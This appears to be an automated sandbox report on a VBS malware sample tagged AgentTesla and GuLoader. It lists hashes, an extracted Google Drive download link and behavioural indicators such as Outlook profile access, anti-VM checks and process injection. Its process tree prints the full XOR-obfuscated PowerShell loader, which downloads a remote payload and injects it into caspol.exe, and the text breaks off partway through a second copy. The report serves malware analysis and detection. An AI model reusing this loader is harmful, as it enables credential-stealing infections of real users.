Analysis
-
max time kernel
94s -
max time network
97s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-02-2023 18:41
Static task
static1
Behavioral task
behavioral1
Sample
Transf....vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Transf....vbs
Resource
win10v2004-20220812-en
General
-
Target
Transf....vbs
-
Size
123KB
-
MD5
84f3d45749a8fbf516a9fa3366b29e26
-
SHA1
6c5c766ceae655caf5468da5b41346eec0602cc7
-
SHA256
7d4aad4ccac671a9a98a5205380b89553b30fccbbf90b477a3e19cb4f9d2c55f
-
SHA512
5238bb38e86e38426b2ceba742cb6732d2877e5c8b27446425df2b7a9895a429dd6c51d2fced2a3c2ec65e54c655e5ba9634a391565183be55666242698b0914
-
SSDEEP
3072:FXDq3Cj8LqSZ9Qy7jPLWCuHQq0mug5yzf:1Dw/mg9QyXYHn0muPT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1_-w5Me4EvTzbdzIX_v_YMZdeLAzHrV5z
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid process 2 1944 WScript.exe 6 1628 powershell.exe 9 1628 powershell.exe 11 1628 powershell.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
caspol.exepowershell.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 api.ipify.org 21 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exepid process 268 caspol.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 1628 powershell.exe 268 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1628 set thread context of 268 1628 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
WScript.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 896 powershell.exe 1628 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 896 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 268 caspol.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1944 wrote to memory of 1508 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 1508 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 1508 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 1312 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 1312 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 1312 1944 WScript.exe cmd.exe PID 1944 wrote to memory of 896 1944 WScript.exe powershell.exe PID 1944 wrote to memory of 896 1944 WScript.exe powershell.exe PID 1944 wrote to memory of 896 1944 WScript.exe powershell.exe PID 896 wrote to memory of 1628 896 powershell.exe powershell.exe PID 896 wrote to memory of 1628 896 powershell.exe powershell.exe PID 896 wrote to memory of 1628 896 powershell.exe powershell.exe PID 896 wrote to memory of 1628 896 powershell.exe powershell.exe PID 1628 wrote to memory of 268 1628 powershell.exe caspol.exe PID 1628 wrote to memory of 268 1628 powershell.exe caspol.exe PID 1628 wrote to memory of 268 1628 powershell.exe caspol.exe PID 1628 wrote to memory of 268 1628 powershell.exe caspol.exe PID 1628 wrote to memory of 268 1628 powershell.exe caspol.exe -
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transf....vbs"1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\cmd.execmd /c echo off2⤵PID:1508
-
-
C:\Windows\System32\cmd.execmd /c echo rshell2⤵PID:1312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reconnaiss = """Function Jernfo11 { param([String]`$Underb136); `$Venom = ''; Write-Host `$Venom; Write-Host `$Venom; Write-Host `$Venom; `$Fensn = New-Object byte[] (`$Underb136.Length / 2); For(`$Afmrkn=0; `$Afmrkn -lt `$Underb136.Length; `$Afmrkn+=2){ `$Fensn[`$Afmrkn/2] = [convert]::ToByte(`$Underb136.Substring(`$Afmrkn, 2), 16); `$Klovs = (`$Fensn[`$Afmrkn/2] -bxor 119); `$Fensn[`$Afmrkn/2] = `$Klovs; } [String][System.Text.Encoding]::ASCII.GetString(`$Fensn);}`$Tenden0=Jernfo11 '240E0403121A59131B1B';`$Tenden1=Jernfo11 '3A1E1405180418110359201E194445592219041611123916031E01123A12031F181304';`$Tenden2=Jernfo11 '3012032705181436131305120404';`$Tenden3=Jernfo11 '240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B12251211';`$Tenden4=Jernfo11 '0403051E1910';`$Tenden5=Jernfo11 '3012033A1813021B123F1619131B12';`$Tenden6=Jernfo11 '2523240712141E161B39161A125B573F1E1312350E241E105B572702151B1E14';`$Tenden7=Jernfo11 '250219031E1A125B573A161916101213';`$Tenden8=Jernfo11 '2512111B121403121333121B1210160312';`$Tenden9=Jernfo11 '3E193A121A18050E3A1813021B12';`$usneavitam0=Jernfo11 '3A0E33121B1210160312230E0712';`$usneavitam1=Jernfo11 '341B1604045B572702151B1E145B572412161B12135B573619041E341B1604045B5736020318341B160404';`$usneavitam2=Jernfo11 '3E1901181C12';`$usneavitam3=Jernfo11 '2702151B1E145B573F1E1312350E241E105B57391200241B18035B57211E050302161B';`$usneavitam4=Jernfo11 '211E050302161B361B1B1814';`$usneavitam5=Jernfo11 '1903131B1B';`$usneavitam6=Jernfo11 '390327051803121403211E050302161B3A121A18050E';`$usneavitam7=Jernfo11 '3E322F';`$usneavitam8=Jernfo11 '2B';`$udklipsbo=Jernfo11 '222432254445';`$Kiddike=Jernfo11 '34161B1B201E191318002705181436';function fkp {Param (`$Sandh, `$Dosis) ;`$Uncon0 =Jernfo11 '53201215001F1212574A575F2C36070733181A161E192A4D4D3402050512190333181A161E1959301203360404121A151B1E12045F5E570B57201F1205125A38151D121403570C57532859301B1815161B360404121A151B0E3416141F12575A361913575328593B181416031E18195924071B1E035F530204191216011E03161A4F5E2C5A462A59320602161B045F53231219131219475E570A5E59301203230E07125F53231219131219465E';.(`$usneavitam7) `$Uncon0;`$Uncon5 = Jernfo11 '53241C1E191C121B1219574A5753201215001F1212593012033A12031F18135F53231219131219455B572C230E07122C2A2A57375F53231219131219445B5753231219131219435E5E';.(`$usneavitam7) `$Uncon5;`$Uncon1 = Jernfo11 '0512030205195753241C1E191C121B1219593E1901181C125F5319021B1B5B57375F2C240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B122512112A5F3912005A38151D12140357240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B122512115F5F3912005A38151D121403573E19032703055E5B575F53201215001F1212593012033A12031F18135F53231219131219425E5E593E1901181C125F5319021B1B5B57375F53241619131F5E5E5E5E5B57533318041E045E5E';.(`$usneavitam7) `$Uncon1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Semidec,[Parameter(Position = 1)] [Type] `$Udmagr = [Void]);`$Uncon2 = Jernfo11 '5322191604041E10191213574A572C36070733181A161E192A4D4D3402050512190333181A161E19593312111E1912330E19161A1E14360404121A151B0E5F5F3912005A38151D12140357240E0403121A592512111B1214031E181959360404121A151B0E39161A125F532312191312194F5E5E5B572C240E0403121A592512111B1214031E181959321A1E0359360404121A151B0E35021E1B1312053614141204042A4D4D2502195E593312111E1912330E19161A1E143A1813021B125F532312191312194E5B575311161B04125E593312111E1912230E07125F530204191216011E03161A475B57530204191216011E03161A465B572C240E0403121A593A021B031E1416040333121B12101603122A5E';.(`$usneavitam7) `$Uncon2;`$Uncon3 = Jernfo11 '5322191604041E10191213593312111E191234181904030502140318055F53231219131219415B572C240E0403121A592512111B1214031E18195934161B1B1E1910341819011219031E1819042A4D4D24031619131605135B575324121A1E1312145E592412033E1A071B121A12190316031E1819311B1610045F53231219131219405E';.(`$usneavitam7) `$Uncon3;`$Uncon4 = Jernfo11 '5322191604041E10191213593312111E19123A12031F18135F530204191216011E03161A455B57530204191216011E03161A445B575322131A1610055B575324121A1E1312145E592412033E1A071B121A12190316031E1819311B1610045F53231219131219405E';.(`$usneavitam7) `$Uncon4;`$Uncon5 = Jernfo11 '051203020519575322191604041E1019121359340512160312230E07125F5E';.(`$usneavitam7) `$Uncon5 ;}`$Procolleg = Jernfo11 '1C120519121B4445';`$Jernfo03 = Jernfo11 '30120334181904181B12201E19131800';`$Jernfo00=Jernfo11 '241F1800201E19131800';`$Jernfo01 = Jernfo11 '532403181A1603574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575302131C1B1E0704151857533D120519111847475E5B575F30332357375F2C3E19032703052A5B572C223E190344452A5E575F2C3E19032703052A5E5E5E';.(`$usneavitam7) `$Jernfo01;`$Jernfo02 = Jernfo11 '53351800121B1B1213131846424E574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575327051814181B1B121057533D120519111847445E5B575F30332357375F2C3E19032703052A5E575F2C3E19032703052A5E5E5E';.(`$usneavitam7) `$Jernfo02;`$Uncon7 = Jernfo11 '53320F1E040312574A5753351800121B1B1213131846424E593E1901181C125F475E';.(`$usneavitam7) `$Uncon7;`$Uncon7 = Jernfo11 '532403181A1603593E1901181C125F53320F1E0403125B57475E';.(`$usneavitam7) `$Uncon7;`$Uncon6 = Jernfo11 '531A121B13574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575327051814181B1B121057530204191216011E03161A435E5B575F30332357375F2C3E19032703052A5B572C223E190344452A5B572C223E190344452A5B572C223E190344452A5E575F2C3E19032703052A5E5E5E';.(`$usneavitam7) `$Uncon6;`$Disputats219 = fkp `$usneavitam5 `$usneavitam6;`$Uncon7 = Jernfo11 '533F1B13191E44574A57531A121B13593E1901181C125F2C3E19032703052A4D4D2D1205185B5741434E5B57470F444747475B57470F43475E';.(`$usneavitam7) `$Uncon7;`$Uncon8 = Jernfo11 '53270518100516454544574A57531A121B13593E1901181C125F2C3E19032703052A4D4D2D1205185B5745424E44424F40455B57470F444747475B57470F435E';.(`$usneavitam7) `$Uncon8;`$Jernfo01 = 'https://drive.google.com/uc?export=download&id=1_-w5Me4EvTzbdzIX_v_YMZdeLAzHrV5z';`$Jernfo00 = Jernfo11 '53351E1B1B444F574A575F3912005A38151D1214035739120359201215341B1E1219035E59331800191B1816132403051E19105F533D120519111847465E';`$Uncon8 = Jernfo11 '533F1B13191E454A531219014D16070713160316';.(`$usneavitam7) `$Uncon8;`$Hldni2=`$Hldni2+'\Ufor.dat';`$Bill38='';if (-not(Test-Path `$Hldni2)) {while (`$Bill38 -eq '') {.(`$usneavitam7) `$Jernfo00;Start-Sleep 5;}Set-Content `$Hldni2 `$Bill38;}`$Bill38 = Get-Content `$Hldni2;`$Uncon9 = Jernfo11 '532219141819574A572C240E0403121A59341819011205032A4D4D3105181A3516041241432403051E19105F53351E1B1B444F5E';.(`$usneavitam7) `$Uncon9;`$Bill380 = Jernfo11 '2C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D3418070E5F5322191418195B57475B5757533F1B13191E445B5741434E5E';.(`$usneavitam7) `$Bill380;`$Skdeskind=`$Uncon.count-649;`$Bill381 = Jernfo11 '2C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D3418070E5F5322191418195B5741434E5B57532705181005164545445B5753241C1312041C1E19135E';.(`$usneavitam7) `$Bill381;`$Bill382 = Jernfo11 '532401011203041E1A574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575302131C1B1E0704151857533C1E13131E1C125E5B575F30332357375F2C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5E575F2C3E19032703052A5E5E5E';.(`$usneavitam7) `$Bill382;`$Bill383 = Jernfo11 '532401011203041E1A593E1901181C125F533F1B13191E445B532705181005164545445B53331E0407020316030445464E5B475B475E';.(`$usneavitam7) `$Bill383#;""";Function Bill389 { param([String]$Underb136); For($Afmrkn=0; $Afmrkn -lt $Underb136.Length-1; $Afmrkn+=(0+1)){$Jernfo = $Jernfo + $Underb136.Substring($Afmrkn, 1)}; $Jernfo;}$Intel0 = Bill389 'IEX ';$Intel1= Bill389 $Reconnaiss;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Intel1 ;}else{.$Intel0 $Intel1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Jernfo11 { param([String]$Underb136); $Venom = ''; Write-Host $Venom; Write-Host $Venom; Write-Host $Venom; $Fensn = New-Object byte[] ($Underb136.Length / 2); For($Afmrkn=0; $Afmrkn -lt $Underb136.Length; $Afmrkn+=2){ $Fensn[$Afmrkn/2] = [convert]::ToByte($Underb136.Substring($Afmrkn, 2), 16); $Klovs = ($Fensn[$Afmrkn/2] -bxor 119); $Fensn[$Afmrkn/2] = $Klovs; } [String][System.Text.Encoding]::ASCII.GetString($Fensn);}$Tenden0=Jernfo11 '240E0403121A59131B1B';$Tenden1=Jernfo11 '3A1E1405180418110359201E194445592219041611123916031E01123A12031F181304';$Tenden2=Jernfo11 '3012032705181436131305120404';$Tenden3=Jernfo11 '240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B12251211';$Tenden4=Jernfo11 '0403051E1910';$Tenden5=Jernfo11 '3012033A1813021B123F1619131B12';$Tenden6=Jernfo11 '2523240712141E161B39161A125B573F1E1312350E241E105B572702151B1E14';$Tenden7=Jernfo11 '250219031E1A125B573A161916101213';$Tenden8=Jernfo11 '2512111B121403121333121B1210160312';$Tenden9=Jernfo11 '3E193A121A18050E3A1813021B12';$usneavitam0=Jernfo11 '3A0E33121B1210160312230E0712';$usneavitam1=Jernfo11 '341B1604045B572702151B1E145B572412161B12135B573619041E341B1604045B5736020318341B160404';$usneavitam2=Jernfo11 '3E1901181C12';$usneavitam3=Jernfo11 '2702151B1E145B573F1E1312350E241E105B57391200241B18035B57211E050302161B';$usneavitam4=Jernfo11 '211E050302161B361B1B1814';$usneavitam5=Jernfo11 '1903131B1B';$usneavitam6=Jernfo11 '390327051803121403211E050302161B3A121A18050E';$usneavitam7=Jernfo11 '3E322F';$usneavitam8=Jernfo11 '2B';$udklipsbo=Jernfo11 '222432254445';$Kiddike=Jernfo11 '34161B1B201E191318002705181436';function fkp {Param ($Sandh, $Dosis) ;$Uncon0 =Jernfo11 '53201215001F1212574A575F2C36070733181A161E192A4D4D3402050512190333181A161E1959301203360404121A151B1E12045F5E570B57201F1205125A38151D121403570C57532859301B1815161B360404121A151B0E3416141F12575A361913575328593B181416031E18195924071B1E035F530204191216011E03161A4F5E2C5A462A59320602161B045F53231219131219475E570A5E59301203230E07125F53231219131219465E';.($usneavitam7) $Uncon0;$Uncon5 = Jernfo11 '53241C1E191C121B1219574A5753201215001F1212593012033A12031F18135F53231219131219455B572C230E07122C2A2A57375F53231219131219445B5753231219131219435E5E';.($usneavitam7) $Uncon5;$Uncon1 = Jernfo11 '0512030205195753241C1E191C121B1219593E1901181C125F5319021B1B5B57375F2C240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B122512112A5F3912005A38151D12140357240E0403121A59250219031E1A12593E190312051807241205011E141204593F1619131B122512115F5F3912005A38151D121403573E19032703055E5B575F53201215001F1212593012033A12031F18135F53231219131219425E5E593E1901181C125F5319021B1B5B57375F53241619131F5E5E5E5E5B57533318041E045E5E';.($usneavitam7) $Uncon1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Semidec,[Parameter(Position = 1)] [Type] $Udmagr = [Void]);$Uncon2 = Jernfo11 '5322191604041E10191213574A572C36070733181A161E192A4D4D3402050512190333181A161E19593312111E1912330E19161A1E14360404121A151B0E5F5F3912005A38151D12140357240E0403121A592512111B1214031E181959360404121A151B0E39161A125F532312191312194F5E5E5B572C240E0403121A592512111B1214031E181959321A1E0359360404121A151B0E35021E1B1312053614141204042A4D4D2502195E593312111E1912330E19161A1E143A1813021B125F532312191312194E5B575311161B04125E593312111E1912230E07125F530204191216011E03161A475B57530204191216011E03161A465B572C240E0403121A593A021B031E1416040333121B12101603122A5E';.($usneavitam7) $Uncon2;$Uncon3 = Jernfo11 '5322191604041E10191213593312111E191234181904030502140318055F53231219131219415B572C240E0403121A592512111B1214031E18195934161B1B1E1910341819011219031E1819042A4D4D24031619131605135B575324121A1E1312145E592412033E1A071B121A12190316031E1819311B1610045F53231219131219405E';.($usneavitam7) $Uncon3;$Uncon4 = Jernfo11 '5322191604041E10191213593312111E19123A12031F18135F530204191216011E03161A455B57530204191216011E03161A445B575322131A1610055B575324121A1E1312145E592412033E1A071B121A12190316031E1819311B1610045F53231219131219405E';.($usneavitam7) $Uncon4;$Uncon5 = Jernfo11 '051203020519575322191604041E1019121359340512160312230E07125F5E';.($usneavitam7) $Uncon5 ;}$Procolleg = Jernfo11 '1C120519121B4445';$Jernfo03 = Jernfo11 '30120334181904181B12201E19131800';$Jernfo00=Jernfo11 '241F1800201E19131800';$Jernfo01 = Jernfo11 '532403181A1603574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575302131C1B1E0704151857533D120519111847475E5B575F30332357375F2C3E19032703052A5B572C223E190344452A5E575F2C3E19032703052A5E5E5E';.($usneavitam7) $Jernfo01;$Jernfo02 = Jernfo11 '53351800121B1B1213131846424E574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575327051814181B1B121057533D120519111847445E5B575F30332357375F2C3E19032703052A5E575F2C3E19032703052A5E5E5E';.($usneavitam7) $Jernfo02;$Uncon7 = Jernfo11 '53320F1E040312574A5753351800121B1B1213131846424E593E1901181C125F475E';.($usneavitam7) $Uncon7;$Uncon7 = Jernfo11 '532403181A1603593E1901181C125F53320F1E0403125B57475E';.($usneavitam7) $Uncon7;$Uncon6 = Jernfo11 '531A121B13574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575327051814181B1B121057530204191216011E03161A435E5B575F30332357375F2C3E19032703052A5B572C223E190344452A5B572C223E190344452A5B572C223E190344452A5E575F2C3E19032703052A5E5E5E';.($usneavitam7) $Uncon6;$Disputats219 = fkp $usneavitam5 $usneavitam6;$Uncon7 = Jernfo11 